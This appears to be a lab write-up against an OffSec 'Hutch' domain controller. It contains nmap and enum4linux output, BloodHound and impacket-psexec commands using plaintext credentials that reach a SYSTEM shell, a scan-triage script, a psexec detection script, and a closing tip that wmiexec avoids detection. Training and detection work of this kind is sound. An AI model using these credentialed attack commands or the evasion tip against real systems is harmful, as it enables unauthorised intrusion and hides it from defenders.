$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 192.168.231.122
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-04 13:49 +08
Nmap scan report for 192.168.231.122
Host is up (0.0095s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
|   Server Date: Tue, 04 Jun 2024 05:51:00 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
|   WebDAV type: Unknown
|   Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
|_  Server Type: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-04 05:50:12Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
|   date: 2024-06-04T05:51:02
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.69 seconds
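The scan above already says most of what matters about the target: Kerberos (88), LDAP (389/636/3268/3269), ADWS (9389) and WinRM (5985) mark it as a domain controller; the LDAP banner leaks the domain (the trailing `0.` in `hutch.offsec0.` is banner noise, the real name is `hutch.offsec` as BloodHound confirms further down); IIS advertises write-capable WebDAV methods (PUT, MOVE, COPY, MKCOL, PROPPATCH); and the Kerberos probe reports the DC's clock, which matters because Kerberos rejects tickets when client and DC differ by more than five minutes. The following script is an added example, not a tool from the original write-up: it parses `-oN` output in the layout shown above and pulls those points out, including the `/etc/hosts` line needed before any Kerberos-based tooling will resolve `hutchdc.hutch.offsec`. The embedded report is a constructed excerpt of the scan above; the `0.`-stripping rule for the LDAP banner and the minute-resolution skew estimate are my assumptions.

```python
"""Triage an nmap -oN report for an Active Directory host.

Added example for this write-up, not a tool from the original page. It
parses nmap "normal" output, extracts the AD domain and DC host name,
flags write-capable WebDAV methods on IIS, proposes the hosts(5) line
Kerberos tooling needs, and estimates Kerberos clock skew.
"""
import json
import re
from datetime import datetime, timedelta, timezone

# Constructed excerpt of the scan above (whitespace re-aligned to nmap's layout).
SAMPLE_REPORT = """\
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-04 13:49 +08
Nmap scan report for 192.168.231.122
Host is up (0.0095s latency).
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-04 05:50:12Z)
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
TARGET_RE = re.compile(r"^Nmap scan report for (.+)$")
# Only a numeric zone such as "+08" or "+0800" is usable; a name like "CST" is not.
START_RE = re.compile(r"^Starting Nmap .* at (\d{4}-\d{2}-\d{2} \d{2}:\d{2}) ([+-]\d{2}):?(\d{2})?")
KRB_TIME_RE = re.compile(r"server time: (\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})Z")
DOMAIN_RE = re.compile(r"Domain: ([^,\s]+)")
HOST_RE = re.compile(r"^Service Info: Host: ([^;]+)")
RISKY_RE = re.compile(r"Potentially risky methods: (.+)$")

WEBDAV_WRITE = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}
MAX_SKEW_SECONDS = 300  # Kerberos default clock-skew tolerance (5 minutes)


def parse_target(line):
    """Target address; prefers the '(ip)' part when nmap printed a hostname."""
    m = TARGET_RE.match(line)
    if not m:
        return None
    name = m.group(1).strip()
    paren = re.search(r"\(([^)]+)\)$", name)
    return paren.group(1) if paren else name


def parse_scan_start(line):
    """Scan start as an aware UTC datetime, or None if the zone is not numeric."""
    m = START_RE.match(line)
    if not m:
        return None
    local = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M")
    hours = int(m.group(2))
    minutes = int(m.group(3) or 0) * (1 if hours >= 0 else -1)
    tz = timezone(timedelta(hours=hours, minutes=minutes))
    return local.replace(tzinfo=tz).astimezone(timezone.utc)


def triage(report):
    result = {
        "target": None, "domain": None, "host": None, "open_ports": {},
        "likely_dc": False, "webdav_write_methods": [], "hosts_entry": None,
        "kerberos_skew_seconds": None, "kerberos_skew_ok": None,
    }
    scan_start = server_time = None
    for line in report.splitlines():
        line = line.rstrip()
        if line.startswith("Nmap scan report for"):
            result["target"] = parse_target(line)
        elif line.startswith("Starting Nmap"):
            scan_start = parse_scan_start(line)
        elif (m := PORT_RE.match(line)) and m.group(3) == "open":
            port, _proto, _state, service, version = m.groups()
            result["open_ports"][int(port)] = (service, version)
            if d := DOMAIN_RE.search(version):
                # Assumption: the trailing "0." nmap prints after the LDAP domain
                # ("hutch.offsec0.") is banner noise, not part of the DNS name.
                result["domain"] = re.sub(r"0?\.$", "", d.group(1))
            if k := KRB_TIME_RE.search(version):
                server_time = datetime.strptime(k.group(1), "%Y-%m-%d %H:%M:%S")
                server_time = server_time.replace(tzinfo=timezone.utc)
        elif m := RISKY_RE.search(line):
            result["webdav_write_methods"] = sorted(set(m.group(1).split()) & WEBDAV_WRITE)
        elif m := HOST_RE.match(line):
            result["host"] = m.group(1).strip()
    ports = result["open_ports"]
    # Kerberos and LDAP on the same host is the signature of a domain controller.
    result["likely_dc"] = 88 in ports and 389 in ports
    if result["target"] and result["host"] and result["domain"]:
        fqdn = f"{result['host'].lower()}.{result['domain']}"
        result["hosts_entry"] = f"{result['target']} {fqdn} {result['domain']}"
    if scan_start and server_time:
        # Minute-resolution estimate (nmap's start line carries no seconds);
        # still enough to catch the multi-minute drift that breaks Kerberos.
        skew = int((server_time - scan_start).total_seconds())
        result["kerberos_skew_seconds"] = skew
        result["kerberos_skew_ok"] = abs(skew) <= MAX_SKEW_SECONDS
    return result


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_REPORT), indent=2))
```

Run it against the real `nmap` file from the scan (`triage(open("nmap").read())`) and the `hosts_entry` value is the line to append to `/etc/hosts`; if `kerberos_skew_ok` is false, sync the clock against the DC before requesting any tickets.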
$ enum4linux -a 192.168.231.122
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jun 4 13:54:28 2024
=========================================( Target Information )=========================================
Target ........... 192.168.231.122
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==========================( Enumerating Workgroup/Domain on 192.168.231.122 )==========================
[E] Can't find workgroup/domain
==============================( Nbtstat Information for 192.168.231.122 )==============================
Looking up status of 192.168.231.122
No reply from 192.168.231.122
==================================( Session Check on 192.168.231.122 )==================================
[+] Server 192.168.231.122 allows sessions using username '', password ''
===============================( Getting domain SID for 192.168.231.122 )===============================
Domain Name: HUTCH
Domain Sid: S-1-5-21-2216925765-458455009-2806096489
[+] Host is part of a domain (not a workgroup)
=================================( OS information on 192.168.231.122 )=================================
[E] Can't get OS info with smbclient
[+] Got OS info for 192.168.231.122 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
======================================( Users on 192.168.231.122 )======================================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
================================( Share Enumeration on 192.168.231.122 )================================
do_connect: Connection to 192.168.231.122 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 192.168.231.122
==========================( Password Policy Information for 192.168.231.122 )==========================
[E] Unexpected error from polenum:
[+] Attaching to 192.168.231.122 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:192.168.231.122)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[E] Failed to get password policy with rpcclient
=====================================( Groups on 192.168.231.122 )=====================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=================( Users on 192.168.231.122 via RID cycling (RIDS: 500-550,1000-1050) )=================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
==============================( Getting printer info for 192.168.231.122 )==============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Tue Jun 4 13:54:51 2024
$ enum4linux -a -u 'guest' -p '' 192.168.231.122
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jun 4 13:56:03 2024
=========================================( Target Information )=========================================
Target ........... 192.168.231.122
RID Range ........ 500-550,1000-1050
Username ......... 'guest'
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==========================( Enumerating Workgroup/Domain on 192.168.231.122 )==========================
[E] Can't find workgroup/domain
==============================( Nbtstat Information for 192.168.231.122 )==============================
Looking up status of 192.168.231.122
No reply from 192.168.231.122
==================================( Session Check on 192.168.231.122 )==================================
[E] Server doesn't allow session using username 'guest', password ''. Aborting remainder of tests.
$ bloodhound-python -c all -d hutch.offsec -u fmcsorley -p CrabSharkJellyfish192 -ns 192.168.231.122
INFO: Found AD domain: hutch.offsec
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (hutchdc.hutch.offsec:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: hutchdc.hutch.offsec
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: hutchdc.hutch.offsec
INFO: Found 18 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: hutchdc.hutch.offsec
INFO: Done in 00M 04S
$ impacket-psexec hutch.offsec/administrator:'B8}2F5,4b03298'@192.168.231.122
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
[*] Requesting shares on 192.168.231.122.....
[*] Found writable share ADMIN$
[*] Uploading file ZlWYNOKQ.exe
[*] Opening SVCManager on 192.168.231.122.....
[*] Creating service MoUL on 192.168.231.122.....
[*] Starting service MoUL.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
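The shell above is as loud as it looks: `impacket-psexec` uploads an executable with a random eight-letter name (`ZlWYNOKQ.exe`) to `ADMIN$`, then registers and starts a service with a random four-letter name (`MoUL`) through the Service Control Manager. On the target that leaves a file under `%SystemRoot%` and a System-log event 7045 ("A service was installed in the system") naming both. The following is an added detection example, not part of the original write-up and not tied to any particular SIEM: it scores 7045-style records for that pattern, and also for the Sysinternals `PSEXESVC` service. The sample records are constructed, and the exact `ImagePath` form (`%SystemRoot%\ZlWYNOKQ.exe`) is my assumption based on the upload to `ADMIN$`.

```python
"""Flag service-install (event 7045) records that look like a psexec drop.

Added detection example for the step above; not part of the original
write-up. Matches the Impacket psexec pattern (four-letter service name
plus an eight-letter executable directly under %SystemRoot%) and the
Sysinternals PSEXESVC service.
"""
import re

# Constructed sample records, not real telemetry from the box above.
SAMPLE_EVENTS = [
    {"event_id": 7045, "service_name": "Sense",
     "image_path": r'"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"',
     "account": "LocalSystem", "start_type": "auto start"},
    # Assumed shape of the event left by the psexec session above.
    {"event_id": 7045, "service_name": "MoUL",
     "image_path": r"%SystemRoot%\ZlWYNOKQ.exe",
     "account": "LocalSystem", "start_type": "demand start"},
    # Four-letter name but a normal install path: must not fire.
    {"event_id": 7045, "service_name": "ACME",
     "image_path": r"C:\Program Files\Acme\acmesvc.exe",
     "account": "LocalSystem", "start_type": "auto start"},
    {"event_id": 7045, "service_name": "PSEXESVC",
     "image_path": r"%SystemRoot%\PSEXESVC.exe",
     "account": "LocalSystem", "start_type": "demand start"},
    # Not a service-install event at all; ignored regardless of fields.
    {"event_id": 7036, "service_name": "MoUL", "image_path": "",
     "account": "", "start_type": ""},
]

RANDOM_SERVICE_RE = re.compile(r"^[A-Za-z]{4}$")
# %SystemRoot%\xxxxxxxx.exe or C:\Windows\xxxxxxxx.exe, eight letters, any case.
SYSROOT_RANDOM_EXE_RE = re.compile(r"^(?:%systemroot%|c:\\windows)\\[a-z]{8}\.exe$", re.I)


def classify(event):
    """Return the reasons a 7045 record is suspicious; an empty list means benign."""
    if event.get("event_id") != 7045:
        return []
    name = event.get("service_name", "")
    path = event.get("image_path", "").strip('"')
    reasons = []
    # Both halves are required: a four-letter name alone (e.g. "ACME") is common.
    if RANDOM_SERVICE_RE.match(name) and SYSROOT_RANDOM_EXE_RE.match(path):
        reasons.append("impacket psexec pattern: 4-letter service, 8-letter exe in %SystemRoot%")
    if name.upper() == "PSEXESVC":
        reasons.append("Sysinternals PsExec service (PSEXESVC)")
    return reasons


def find_psexec_installs(events):
    """(service_name, image_path, reasons) for every record that classify() flags."""
    hits = []
    for event in events:
        reasons = classify(event)
        if reasons:
            hits.append((event["service_name"], event["image_path"], reasons))
    return hits


if __name__ == "__main__":
    for name, path, reasons in find_psexec_installs(SAMPLE_EVENTS):
        print(f"{name:10} {path:40} {'; '.join(reasons)}")
```

The four-letter/eight-letter pairing is what separates the Impacket drop from ordinary short service names; on an engagement where service creation is being watched, `impacket-wmiexec` (which creates no service and writes no binary) is the quieter way to get the same shell from the same credentials.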